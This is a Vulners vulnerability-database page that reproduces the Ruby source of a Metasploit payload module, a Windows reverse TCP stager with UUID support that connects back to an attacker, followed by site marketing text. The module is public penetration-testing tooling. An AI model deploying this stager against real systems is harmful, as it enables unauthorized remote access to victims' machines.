Lucene search
+L

Windows Inject PE Files, Reverse TCP Stager with UUID Support

🗓️ 02 Sep 2020 17:41:01Reported by ege <[email protected]>, hdm <[email protected]>, OJ ReevesType 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

Load PE file using reflective loader for process injection, Connect back to attacker with UUID

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 329

  include Msf::Payload::Stager
  include Msf::Payload::Windows::ReverseTcp

  def self.handler_type_alias
    'reverse_tcp_uuid'
  end

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Reverse TCP Stager with UUID Support',
        'Description' => 'Connect back to the attacker with UUID Support',
        'Author' => [ 'hdm', 'OJ Reeves' ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Handler' => Msf::Handler::ReverseTcp,
        'Convention' => 'sockedi',
        'Stager' => { 'RequiresMidstager' => false }
      )
    )
  end

  #
  # Override the uuid function and opt-in for sending the
  # UUID in the stage.
  #
  def include_send_uuid
    true
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation